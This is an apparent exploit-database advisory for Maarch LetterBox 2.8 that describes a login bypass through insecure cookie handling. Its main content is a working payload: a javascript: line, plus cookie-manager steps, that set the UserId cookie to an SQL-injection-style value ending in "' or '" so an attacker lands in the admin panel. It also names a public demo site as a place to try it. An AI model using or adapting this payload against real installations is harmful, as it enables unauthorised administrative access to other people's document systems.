# Title: Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com# Home : http://milw00rm.com / its online# Date : 17.11.2014# Demo : http://www.era.sn/courrier# Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
you first go here:
http://www.target.com/path/index.php?page=welcome.php
you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.
exploit:
javascript:document.cookie ="UserId=[username] ' or '; path=/";or you edit your cookie's with"Cookies Manager"
name = maarch
contents = UserId=username ' or '
host = your target
path =/script_path/and dont change other options its keep default.
